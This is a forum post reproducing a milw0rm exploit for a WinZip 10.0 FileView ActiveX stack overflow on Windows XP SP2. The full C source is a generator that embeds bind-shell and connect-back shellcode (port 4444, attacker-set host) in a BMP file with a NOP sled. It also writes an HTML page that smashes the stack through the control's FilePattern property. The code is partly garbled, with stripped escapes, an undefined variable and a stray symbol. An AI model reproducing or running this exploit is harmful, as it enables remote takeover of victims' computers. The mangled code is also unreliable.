zbeng Posted November 15, 2006 Report Posted November 15, 2006 #include <stdio.h>#include <stdlib.h>#include <sys/types.h>#include <sys/stat.h>#include <fcntl.h>#include <unistd.h>#include <getopt.h>#define NOPSIZE 999999struct target { char* name; int retaddr;};struct shellcode { char* name; short port; int host; char* shellcode;};int targetno = 1;struct target targets[] = { {"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269} /* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */};int shellno = 2;struct shellcode shellcodes[] = { {"Win32 x86 bind() shellcode (4444/tcp default)",162,-1, "x48x40xf5x49xd6x4axf9x91x47x96x2fxf8x9bx37x41xf5" "x99x47xf9xf9xfcxf9x48x4ex4bx9bx90x9bxf5x97x40xf9" "xd6x41xf9x48x9bx92xfdx9bx49x42x4fx9fx90xd6x27x9b" "x93x46x2fx90xfdx4ax6ax51x59xd9xeexd9x74x24xf4x5b" "x81x73x13xbcxe8x2bx27x83xebxfcxe2xf4x3dx2cx7fxd5" "x43x17xd7x4dx57xa5xc3xdex43x17xd4x47x37x84x0fx03" "x37xadx17xacxc0xedx53x26x53x63x64x3fx37xb7x0bx26" "x57xa1xa0x13x37xe9xc5x16x7cx71x87xa3x7cx9cx2cxe6" "x76xe5x2axe5x57x1cx10x73x98xc0x5exc2x37xb7x0fx26" "x57x8exa0x2bxf7x63x74x3bxbdx03x28x0bx37x61x47x03" "xa0x89xe8x16x67x8cxa0x64x8cx63x6bx2bx37x98x37x8a" "x37xa8x23x79xd4x66x65x29x50xb8xd4xf1xdaxbbx4dx4f" "x8fxdax43x50xcfxdax74x73x43x38x43xecx51x14x10x77" "x43x3ex74xaex59x8exaaxcaxb4xeax7ex4dxbex17xfbx4f" "x65xe1xdex8axebx17xfdx74xefxbbx78x74xffxbbx68x74" "x43x38x4dx4fxadxb4x4dx74x35x09xbex4fx18xf2x5bxe0" "xebx17xfdx4dxacxb9x7exd8x6cx80x8fx8ax92x01x7cxd8" "x6axbbx7exd8x6cx80xcex6ex3axa1x7cxd8x6axb8x7fx73" "xe9x17xfbxb4xd4x0fx52xe1xc5xbfxd4xf1xe9x17xfbx41" "xd6x8cx4dx4fxdfx85xa2xc2xd6xb8x72x0ex70x61xccx4d" "xf8x61xc9x16x7cx1bx81xd9xfexc5xd5x65x90x7bxa6x5d" "x84x43x80x8cxd4x9axd5x94xaax17x5ex63x43x3ex70x70" "xeexb9x7ax76xd6xe9x7ax76xe9xb9xd4xf7xd4x45xf2x22" "x72xbbxd4xf1xd6x17xd4x10x43x38xa0x70x40x6bxefx43" "x43x3ex79xd8x6cx80x55xffx5ex9bx78xd8x6ax17xfbx27"}, {"Win32 x86 connect() shellcode (4444/tcp default)",167,160, "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45" "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49" "x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d" "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66" "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61" "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40" "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32" "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6" "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09" "xf5xadx57xffxd6x53x53x53x53x43x53x43x53xffxd0x68" "x01x02x03x04x66x68x11x5cx66x53x89xe1x95x68xecxf9" "xaax60x57xffxd6x6ax10x51x55xffxd0x66x6ax64x66x68" "x63x6dx6ax50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3" "xaax95x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab" "x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51" "x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xffxd6" "x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04xffxd6" "xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6xffxd0"}};char html1[]="<HTML>rn<HEAD>rn<TITLE></TITLE>rn</HEAD>rn" "<BODY>rn<SCRIPT LANGUAGE="VBScript">rnSub WZ" "FILEVIEW_OnAfterItemAdd(Item)rnWZFILEVIEW.FilePa" "ttern = ""; /* smash the stack here */char html2[]=""rnend subrn</SCRIPT>rnrn<OBJECT ID="WZFILEV" "IEW" WIDTH=200 HEIGHT=200rnCLASSID="CLSID:A09A" "E68F-B14D-43ED-B713-BA413F034904">rn</OBJECT>r" "n</BODY>rn</HTML>rn";char bmphdr[]="x42x4dx3exbbx2dx00x00x00x00x00x36x00x00" "x00x28x00x00x00xe7x03x00x00xe7x03x00x00" "x01x00x18x00x00x00x00x00x08xbbx2dx00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00";int ret;void help(char* progname){ int count; printf("[ Usage instructions.n[n"); printf("[ %s <required> (optional)n[n[ --filename|-f <file.html>n",progname); printf("[ --imgname|-i <image.bmp>n[ --shellcode|-s <shell#>n"); printf("[ --shellport|-p (port)n"); printf("[ --shellhost|-i (ip)n"); printf("[ --target|-t <target#/0xretaddr>n[n"); printf("[ Target#'sn"); for(count = 0;count <= targetno - 1;count++){ printf("[ %d %s 0x%xn",count,targets[count],targets[count]); } printf("[n[ Shellcode#'sn"); for(count = 0;count <= shellno - 1;count++){ printf("[ %d "%s" (length %d bytes)n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode)); } exit(0);}void setret(char* retarg){ int value = atoi(retarg); switch(value){ case 0: printf("[ Using target '%s'n",targets[ret].name); ret = targets[ret].retaddr; break; default: ret = strtoul(retarg,NULL,16); printf("[ Using return address '0x%x'n",ret); break; }}int main(int argc, char* argv[]){ unsigned long i, fd; int c, index, payg, paya, lhost; short shellport, shellport2; int ishell = 0, itarg = 0; char *buffer, *file, *img, *payload; static struct option options[] = { {"filename", 1, 0, 'f'}, {"imgname", 1, 0, 'i'}, {"target", 1, 0, 't'}, {"shellcode", 1, 0, 's'}, {"shellport", 1, 0, 'p'}, {"shellhost", 1, 0, 'd'}, {"help", 0, 0,'h'} }; printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploitn"); while(c != -1){ c = getopt_long(argc,argv,"f:i:t:s:p:D:h",options,&index); switch©{ case 'f': file = optarg; break; case 'i': img = optarg; break; case 't': itarg = 1; setret(optarg); if(strlen((char*)&ret) < 4){ fprintf(stderr,"[ Selected target contains a null address!n"); exit(-1); } break; case 's': if(ishell==0){ payg = atoi(optarg); switch(payg){ case 0: printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); payload = malloc(strlen(shellcodes[payg].shellcode)+1); memset(payload,0,strlen(shellcodes[payg].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); shellport2 = 4444; ishell = 1; break; case 1: printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); payload = malloc(strlen(shellcodes[payg].shellcode)+1); memset(payload,0,strlen(shellcodes[payg].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); shellport2 = 4444; ishell = 1; break; default: printf("[ Invalid shellcode selection %dn",payg); exit(0); break; } } break; case 'p': if(ishell==1){ if(shellcodes[payg].port > -1){ paya = strlen(payload); shellport = atoi(optarg); shellport2 = shellport; shellport =(shellport&0xff)<<8 | shellport>>8; memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport)); if(paya > strlen(payload)) { printf("[ Error shellcode port introduces null bytesn"); exit(1); } printf("[ Shellcode port changed to '%u'n",atoi(optarg)); } else{ printf("[ (%s) port selection is ignored for current shellcoden",optarg); } } else{ printf("[ No shellcode selected yet, ignoring (%s) port selectionn",optarg); } break; case 'd': if(ishell==1){ if(shellcodes[payg].host > -1){ paya = strlen(payload); lhost = inet_addr(optarg); memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost)); if(paya > strlen(payload)){ printf("[ Error shellhost introduces null bytesn"); exit(1); } printf("[ Shellhost has been changed to '%s'n",optarg); } else{ printf("[ (%s) shellhost selection is ignored for current shellcoden",optarg); } } else { printf("[ No shellcode selected yet, ignoring (%s) shellhost selectionn",optarg); } break; case 'h': help(argv[0]); break; default: break; } } if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){ printf("[ Error insufficient arguements, try running '%s --help'n",argv[0]); exit(0); }// create image printf("[ Creating image containing shellcode '%s'n",img); fd = open(img,O_RDWR|O_CREAT,S_IRWXU); if(fd == -1){ fprintf(stderr,"[ Error creating %sn",file); exit(-1); } write(fd,bmphdr,sizeof(bmphdr)); for(i = 0;i < NOPSIZE;i++){ write(fd,"x90",1); } write(fd,payload,strlen(payload)); close(fd);// create html printf("[ Creating html exploit page '%s'n",file); fd = open(file,O_RDWR|O_CREAT,S_IRWXU); if(fd == -1){ fprintf(stderr,"[ Error creating %sn",file); exit(-1); } write(fd,html1,strlen(html1)); for(i = 0;i < 265;i++){ write(fd,"A",1); } write(fd,&ret,4); for(i = 0;i < 1827;i++){ write(fd,"A",1); } write(fd,html2,strlen(html2)); write(fd,img,strlen(img)); write(fd,html3,strlen(html3)); close(fd);}// milw0rm.com [2006-11-15] Quote
